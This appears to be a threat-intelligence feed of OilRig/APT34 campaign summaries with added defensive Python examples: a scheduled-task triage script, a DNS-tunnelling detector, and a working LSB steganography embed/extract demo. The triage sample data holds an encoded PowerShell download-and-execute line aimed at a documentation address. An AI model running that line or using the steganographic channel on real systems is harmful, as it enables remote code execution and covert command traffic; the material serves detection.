Latest Update: 04/06/2025

Threats Feed

  1. Public

    APT34 Targets Iraqi Government with Dual-Channel C2 and Obfuscated Backdoors

    APT34 (OilRig) has launched a targeted cyber espionage campaign against Iraqi government entities since 2024, using spearphishing emails with forged documents to deploy custom C# malware disguised as PDF files. The malware performs system reconnaissance, anti-VM checks, and sets up persistence via scheduled tasks. It communicates with command-and-control infrastructure through both HTTP and compromised Iraqi government email accounts (SMTP/IMAP). The group also utilizes European-hosted infrastructure with deceptive 404 pages and obfuscated communication protocols. Targeted sectors include government, energy, finance, defense, and telecommunications, indicating a continued focus on intelligence gathering in the Middle East.

  2. Public

    OilRig's Cyber Tactics: Targeting Middle East Sectors with Stealthy Attacks

    OilRig (APT34) has targeted the government, technology and energy sectors across the Middle East. Its operations include spearphishing campaigns, PowerShell-based backdoors (Helminth, QUADAGENT), and exploitation of vulnerabilities such as CVE-2024-30088, a Windows Kernel elevation-of-privilege flaw. The group relies on obfuscation to evade detection, uses stolen credentials to escalate privileges and move laterally, and deploys the STEALHOOK backdoor to exfiltrate harvested credentials and data through compromised on-premises Exchange servers. Key targets include Saudi Arabian organisations and Middle Eastern government agencies, reflecting OilRig's focus on geopolitical intelligence gathering. The campaigns demonstrate persistence, stealth and adaptability consistent with state-sponsored objectives.

  4. Public

    Earth Simnavaz Targets UAE and Persian Gulf Energy Sector with Advanced Cyber Espionage

    Earth Simnavaz, also known as APT34 or OilRig, has been targeting governmental entities in the UAE and the wider Gulf region, with a focus on the energy sector and critical infrastructure. The group exploits CVE-2024-30088, a Windows Kernel elevation-of-privilege vulnerability, to escalate privileges, and abuses on-premises Microsoft Exchange servers to steal credentials and exfiltrate data. It employs custom .NET tools, PowerShell scripts and IIS-based malware to avoid detection, uses ngrok tunnels for persistent remote access and lateral movement, and registers a malicious password filter DLL so that plaintext credentials are captured whenever domain users change their passwords. The stolen credentials are then used to pivot into the victims' partners in a supply-chain attack pattern and to exfiltrate sensitive data through the compromised email servers.

  5. Public

    Breaking Down OilRig's August 2022 Attack: A Detailed Look at Techniques Used

    The Iranian state-sponsored threat actor, OilRig, known for targeting global sectors such as Government, Financial Services, Energy, Telecommunications, and Technology, carried out an attack in August 2022 using a malicious Word document. This document contained embedded macros that dropped additional payloads for discovery, collection, and exfiltration routines. The payloads used PowerShell scripts and Windows utilities for information gathering and established persistence with a scheduled task named "WindowsUpdate". OilRig used multiple techniques in this attack such as Process Discovery, System Information Discovery, File and Directory Discovery, System Network Configuration Discovery, and others.

  6. Public

    TA452 Utilizes PowerShell and AutoHotkey in its Intrusion

    TA452's August 2022 intrusion began with a malicious Word document whose VBA macro established persistence and command-and-control communication. The threat actors used AutoHotkey for keylogging, PowerShell scripts for discovery, and makecab.exe to compress collected data before exfiltration. They relied on base64 encoding, obfuscation and scheduled tasks to maintain access and evade detection. The campaign is linked to the OilRig group and targeted organizations with custom-tailored malware, pointing to state-sponsored activity. Data was exfiltrated over encrypted channels, and the evidence points to an organized, targeted operation.

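
    The two summaries above (items 5 and 6) describe the same August 2022 intrusion: a scheduled task named "WindowsUpdate" launching PowerShell, and makecab.exe used to package collected data. The following triage logic is an added example written for this page, not code from either report or from the threat actor's tooling. It runs over a handful of constructed events modelled loosely on Windows Security log IDs 4698 (scheduled task created) and 4688 (process created); the field names, the user "CORP\jdoe", and the 203.0.113.5 address are assumptions for the sake of illustration.

```python
"""Triage logic for the persistence pattern in the two August 2022 OilRig/TA452
write-ups: a lookalike scheduled task ("WindowsUpdate") that launches encoded
PowerShell, and makecab.exe used to stage collected data. Sample events below
are constructed for this example, not taken from the reports."""
import base64
import re
from typing import Optional


def _encoded(ps: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(ps.encode("utf-16le")).decode("ascii")


# Constructed events with a simplified field layout modelled on Windows Security
# log IDs 4698 (scheduled task created) and 4688 (process created).
# 203.0.113.5 is a documentation (TEST-NET-3) address, not a real C2.
SAMPLE_EVENTS = [
    {"id": 4698, "subject": "CORP\\jdoe", "task": "\\WindowsUpdate",
     "action": "powershell.exe -w hidden -nop -enc "
               + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"id": 4698, "subject": "NT AUTHORITY\\SYSTEM",
     "task": "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start",
     "action": "%systemroot%\\system32\\sc.exe start wuauserv"},
    {"id": 4688, "subject": "CORP\\jdoe", "parent": "powershell.exe", "image": "makecab.exe",
     "cmdline": "makecab.exe C:\\Users\\jdoe\\AppData\\Local\\Temp\\k.log "
                "C:\\Users\\jdoe\\AppData\\Local\\Temp\\up.cab"},
    {"id": 4688, "subject": "NT AUTHORITY\\SYSTEM", "parent": "TiWorker.exe", "image": "makecab.exe",
     "cmdline": "makecab.exe /f C:\\Windows\\Temp\\cab.ddf"},
]

# Genuine Windows Update tasks live under \Microsoft\Windows\WindowsUpdate\;
# an update-themed task name at the root of the task folder is suspect.
LOOKALIKE_TASK = re.compile(r"^\\(?:windows ?update|microsoft ?update|updater?)$", re.I)
# -e, -ec, -en, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\b\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_task(ev: dict) -> list:
    """Findings for a 4698 event; an empty list means nothing suspicious."""
    findings = []
    if ev["id"] != 4698:
        return findings
    if LOOKALIKE_TASK.match(ev["task"]) and not ev["subject"].upper().endswith("\\SYSTEM"):
        findings.append(f"lookalike task {ev['task']} registered by {ev['subject']}")
    decoded = decode_encoded_command(ev["action"])
    if decoded is not None:
        findings.append("encoded PowerShell action decodes to: " + decoded[:60])
    if HIDDEN_FLAG.search(ev["action"]):
        findings.append("action requests a hidden window")
    return findings


def triage_process(ev: dict) -> list:
    """Findings for a 4688 event involving makecab.exe."""
    findings = []
    if ev["id"] != 4688 or ev.get("image", "").lower() != "makecab.exe":
        return findings
    if ev["parent"].lower() in SCRIPT_HOSTS:
        findings.append(f"makecab.exe spawned by {ev['parent']}")
    if re.search(r"\\users\\[^\\]+\\", ev["cmdline"], re.I):
        findings.append("makecab.exe reading or writing under a user profile")
    return findings


def triage(events) -> list:
    """Return (event index, findings) for every event that produced a finding."""
    hits = []
    for i, ev in enumerate(events):
        findings = triage_task(ev) + triage_process(ev)
        if findings:
            hits.append((i, findings))
    return hits


if __name__ == "__main__":
    for index, findings in triage(SAMPLE_EVENTS):
        print(index, *findings, sep="\n  ")
```

    The point of the three checks is that each one alone is noisy: servicing processes legitimately run makecab.exe, and encoded PowerShell appears in management tooling. Combining the task name with the registering principal, and makecab.exe with its parent process and working paths, is what separates the two constructed malicious events from the two benign ones.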
  7. Public

    OilRig Campaigns: Phishing and PowerShell Attacks on Global Sectors

    AttackIQ has released attack graphs emulating OilRig's operations against global sectors, based on reports from Mandiant, Intezer, and Palo Alto Networks. The 2020 social media phishing campaign used LinkedIn to distribute malicious documents, leading to installation of the TONEDEAF backdoor, persistence via scheduled tasks, and credential dumping with tools like LaZagne. The 2018 QUADAGENT campaign targeted technology service providers and government agencies with PowerShell malware, establishing persistence and using multi-channel command-and-control communication over HTTPS, HTTP and DNS.

  8. Public

    OilRig's Steganography-Based C2 Channel Targets Middle Eastern Telecoms

    OilRig targeted a telecommunications organization in the Middle East using a variant of their RDAT tool, featuring a novel email-based command and control (C2) channel that employs steganography. This method hides commands and data within bitmap images attached to emails, making detection difficult. The attack involved custom Mimikatz tools for credential dumping, Bitvise for SSH tunneling, and PowerShell downloaders. RDAT has been under development since 2017, evolving to include DNS tunneling and Exchange Web Services (EWS) for C2 communications. The use of steganographic images in emails represents a sophisticated evasion technique.

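
    To make concrete how a command can ride inside an ordinary-looking bitmap attachment, here is an added example of least-significant-bit steganography over a 24-bit BMP. It is written for this page and is a generic scheme; the summary above does not describe RDAT's actual encoding, so nothing here should be read as that tool's format. The cover image and the payload are constructed in the block.

```python
"""Generic LSB steganography over a 24-bit BMP, to show how a command or file
can ride inside a valid image attachment. This is an illustrative scheme, not
RDAT's actual encoding, which the summary above does not describe."""
import struct

BMP_HEADER_SIZE = 54  # 14-byte file header + 40-byte BITMAPINFOHEADER


def make_bmp(width: int, height: int, rgb=(0x40, 0x80, 0xC0)) -> bytes:
    """Build a minimal uncompressed 24-bit BMP filled with one colour (constructed cover)."""
    row_bytes = (width * 3 + 3) & ~3            # each row is padded to a 4-byte boundary
    pixel_bytes = row_bytes * height
    file_header = struct.pack("<2sIHHI", b"BM", BMP_HEADER_SIZE + pixel_bytes, 0, 0, BMP_HEADER_SIZE)
    info_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, pixel_bytes, 2835, 2835, 0, 0)
    row = bytes(rgb[::-1]) * width + b"\x00" * (row_bytes - width * 3)   # BMP stores BGR
    return file_header + info_header + row * height


def _pixel_offset(bmp: bytes) -> int:
    """Offset of the pixel array, read from the file header (bytes 10..13)."""
    return struct.unpack_from("<I", bmp, 10)[0]


def embed(bmp: bytes, payload: bytes) -> bytes:
    """Hide payload in the least significant bit of each pixel byte, length-prefixed."""
    data = len(payload).to_bytes(4, "big") + payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]
    off = _pixel_offset(bmp)
    if len(bits) > len(bmp) - off:
        raise ValueError("payload too large for cover image")
    out = bytearray(bmp)
    for k, bit in enumerate(bits):
        out[off + k] = (out[off + k] & 0xFE) | bit      # header bytes are never touched
    return bytes(out)


def extract(bmp: bytes) -> bytes:
    """Recover a payload written by embed()."""
    off = _pixel_offset(bmp)

    def read_bytes(start_bit: int, count: int) -> bytes:
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (bmp[off + start_bit + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)

    length = int.from_bytes(read_bytes(0, 4), "big")
    if 32 + length * 8 > len(bmp) - off:
        raise ValueError("length prefix exceeds image size; not a payload we wrote")
    return read_bytes(32, length)


def lsb_ones_ratio(bmp: bytes) -> float:
    """Fraction of pixel bytes with the LSB set. On a flat cover this exposes the
    embedding immediately; on photographs, real detection needs statistical tests
    on the LSB plane rather than a single ratio."""
    off = _pixel_offset(bmp)
    pixels = bmp[off:]
    return sum(b & 1 for b in pixels) / len(pixels)


if __name__ == "__main__":
    cover = make_bmp(64, 16)
    stego = embed(cover, b"cmd:whoami")
    print(extract(stego), len(cover) == len(stego), lsb_ones_ratio(cover), lsb_ones_ratio(stego))
```

    The stego image keeps its header, size and visible colours, so a gateway that only checks the attachment is a well-formed BMP learns nothing; the channel is only visible if mail filtering inspects image content or if the surrounding behaviour (regular mailbox polling from a host, images of fixed size arriving on a schedule) is examined.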
  9. Public

    APT34 Strikes Again: Advanced and Stealthy TONEDEAF 2.0 Targets US Research Services

    APT34 has launched a new campaign targeting the United States-based research services company Westat and its customers, employing a modified toolset. The attack was discovered in late January 2020 and began with a spear-phishing operation using a file disguised as an employee satisfaction survey, survey.xls. Once the victim enabled macros, malicious VBA code executed, extracting and installing a more advanced and stealthy variant of the TONEDEAF malware, TONEDEAF 2.0. The attackers possibly also deployed the VALUEVAULT implant for browser credential theft. The campaign demonstrates APT34's substantial investment in upgrading its toolset to evade detection.

  10. Public

    ZeroCleare Wiper Targets Middle Eastern Energy Sector in Destructive Cyberattack

    IBM's X-Force team has detailed a new destructive malware, ZeroCleare, targeting the energy sector in the Middle East. Like Shamoon, the wiper overwrites the master boot record and disk partitions, and it does so by abusing the legitimate, signed EldoS RawDisk driver, loaded through a vulnerable VirtualBox driver to bypass Windows driver-signature enforcement. Attribution points to Iranian state-sponsored groups, possibly a collaboration between ITG13 (IBM's designation for APT34/OilRig) and at least one other group. The report highlights the increase in destructive attacks, particularly in the energy sector, and offers mitigation strategies, including the use of threat intelligence, robust security controls and effective backup systems. Finally, it notes the wider geopolitical implications of such attacks.

  11. Public

    Leaked Toolkit Exposes APT34’s Sophisticated Cyberattacks

    This NSFOCUS report analyses a leaked toolkit belonging to the APT34 hacking group, also known as OilRig. It covers the toolkit's components, including the Glimpse and PoisonFrog Trojans and the web shells used for privilege escalation and data exfiltration, primarily against the energy and financial sectors, particularly in China and the Middle East. The analysis details the functionality and communication methods of the tools, which use DNS tunneling for command and control.

  12. Public

    APT34's Phishing Strategy With New Malware Families Targeting Key Sectors

    Mandiant detected a phishing campaign by APT34, an Iranian-nexus threat actor, in late June 2019. Posing as a member of Cambridge University, the actor delivered malicious documents via LinkedIn messages and introduced three new malware families: the TONEDEAF backdoor, the VALUEVAULT browser-credential stealer and the LONGWATCH keylogger. The primary industries targeted by this campaign were Energy and Utilities, Government, and Oil and Gas. APT34 is notably active in the Middle East, employing a blend of public and non-public tools to carry out its cyber espionage activities.

  13. Public

    APT34 Leak Exposes Espionage Tools and Tactics of Iranian Cyber Actors

    The APT34/OILRIG group, linked to Iranian intelligence, had its operational details leaked by the "Lab Dookhtegan" group on Telegram. The leaks revealed C2 infrastructure, PowerShell-based agents, ASP web shells ("HighShell" and "HyperShell"), and a DNS-based espionage toolset ("dnspionage"). These tools facilitate file transfer, credential theft and covert communication via proxies and DNS manipulation. The attackers also collected sensitive data, including domain admin credentials, indicating access to high-value networks. While specific sectors or countries are not detailed, the tools suggest a focus on espionage and disruption. Other tools, such as 'MinionProject' and 'FoxPanel222', remain under analysis.

  14. Public

    Adapting and Evolving: A Look at the OilRig's QUADAGENT-Driven Attacks

    The OilRig group continued its espionage activities, primarily within the Middle East. Between May and June 2018, they orchestrated multiple attacks using compromised accounts from a Middle Eastern government agency, targeting a technology services provider and another government entity. The group leveraged a PowerShell backdoor called QUADAGENT and employed spear-phishing tactics, obfuscation using the Invoke-Obfuscation toolkit, and PE files to achieve their objectives. They also used stolen credentials and decoy dialog boxes to reduce suspicion and evade detection.

  16. Public

    OilRig Campaign: Malware Updates and Expanded Global Targets

    The OilRig cyberattack campaign, first analyzed in May 2016, continues to evolve, targeting government organizations and companies in Saudi Arabia, Qatar, Turkey, Israel, and the United States. Using spear-phishing emails with malicious Microsoft Excel documents, the attackers have updated their toolset, including Clayslide delivery documents and the Helminth backdoor. The malware communicates with remote servers via HTTP and DNS for command and control. Despite its lack of sophistication, the malware successfully operates under the radar in many establishments due to techniques like DNS command and control.

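
    DNS command and control recurs throughout this feed: Helminth here, QUADAGENT in item 7, the Glimpse and PoisonFrog Trojans in item 11 and the "dnspionage" toolset in item 13. The detection sketch below is an added example written for this page, not code from any of the cited reports, showing the per-client, per-domain profiling that makes such channels stand out in resolver logs. The query log is constructed: example.com, example.net and example.org are reserved documentation domains, the 10.0.0.x clients are private addresses, and the hex chunks represent encoded data rather than any real sample.

```python
"""Per-client, per-domain profiling of DNS queries to surface tunnelling-style
command and control, as used by the Helminth, QUADAGENT and Glimpse/PoisonFrog
tooling described above. The query log is constructed for this example; the
reserved example.* domains and RFC 1918 addresses stand in for real ones."""
import math
from collections import Counter, defaultdict

# A tunnel typically emits many unique, long, high-entropy leftmost labels under
# one registered domain. These 32-hex-char chunks are rotations of one string so
# their entropy is known exactly (every hex digit appears twice); they represent
# encoded data, not any real sample.
_CHUNK = "0f1e2d3c4b5a69788796a5b4c3d2e1f0"
SAMPLE_QUERIES = [
    ("10.0.0.7", "www.example.com"),
    ("10.0.0.7", "mail.example.com"),
    ("10.0.0.7", "cdn.example.net"),
    # one long random-looking label, as CDNs and telemetry often produce: not a tunnel
    ("10.0.0.7", "7c1f0a9e4d3b2c5a6e8f1d0b3c9a7e2f.static.example.net"),
    ("10.0.0.9", "www.example.com"),
] + [
    ("10.0.0.9", f"{_CHUNK[i:] + _CHUNK[:i]}.{seq:02d}.t.example.org")
    for seq, i in enumerate((0, 5, 11, 17, 23, 29))
]


def label_entropy(label: str) -> float:
    """Shannon entropy in bits per character (max 4.0 for hex, 5.0 for base32)."""
    if not label:
        return 0.0
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Naive registrable domain (last two labels); production code should use the Public Suffix List."""
    parts = qname.lower().rstrip(".").split(".")
    return ".".join(parts[-2:])


def profile(queries) -> dict:
    """Aggregate query features per (client, registered domain)."""
    groups = defaultdict(list)
    for client, qname in queries:
        groups[(client, registered_domain(qname))].append(qname.lower().rstrip("."))
    result = {}
    for (client, domain), names in groups.items():
        subs = {n[: -len(domain) - 1] for n in names if len(n) > len(domain) + 1} or {""}
        lefts = [s.split(".")[0] for s in subs]
        result[(client, domain)] = {
            "queries": len(names),
            "unique_subdomains": len(subs),
            "mean_left_label_len": sum(map(len, lefts)) / len(lefts),
            "mean_left_label_entropy": sum(map(label_entropy, lefts)) / len(lefts),
        }
    return result


def flag_tunnels(queries, min_unique=5, min_len=20, min_entropy=3.0) -> list:
    """(client, domain) pairs whose traffic looks like DNS tunnelling. All three
    thresholds must trip, so a single long CDN hostname is not enough on its own."""
    return sorted(
        key for key, p in profile(queries).items()
        if p["unique_subdomains"] >= min_unique
        and p["mean_left_label_len"] >= min_len
        and p["mean_left_label_entropy"] >= min_entropy
    )


if __name__ == "__main__":
    for key, p in profile(SAMPLE_QUERIES).items():
        print(key, p)
    print("flagged:", flag_tunnels(SAMPLE_QUERIES))
```

    Grouping by client as well as by domain matters: the same registered domain can be benign for most of the estate and a tunnel endpoint for one host, and a per-domain view alone would average the signal away. Thresholds here are illustrative and should be tuned against a baseline of the organisation's own resolver traffic.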